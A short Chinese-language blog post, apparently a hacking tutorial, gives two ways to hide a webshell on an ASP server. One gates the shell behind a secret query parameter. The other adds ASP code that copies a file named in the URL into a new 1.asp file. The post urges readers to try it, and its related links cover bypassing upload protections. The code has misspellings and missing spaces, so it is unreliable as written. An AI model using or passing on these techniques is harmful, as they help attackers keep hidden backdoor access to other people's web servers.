两种隐藏webshell的方法


两种隐藏webshell的方法


第一种


我们将<%if request(”action”)=”ok” then%>这段代码插入到webshell中

访问时在后面加上?action=ok即可



第二种


我们在webshell里添加如下代码:

<%

on error resumenext

strFileName =Request.QueryString(”filer”)

set objStream =Server.createObject(”ABODB.Stream”)

objStream.Type =1

objStream.Open

objStream.LoadFromFilestrFileName

objStream.SaveToFileServer.mappath(”1.asp”),2

%>


访问的时候在后面加上?filer=xxx  


xxx为输出的路径


执行后会在目录下生成1.asp


效果演示:



方法超级简单 大家可以试下

你会喜欢


双上传突破拿WEBSHELL演示

突破安全狗上传webshell

黑吃黑渗透webshell箱子


相关文章
相关标签/搜索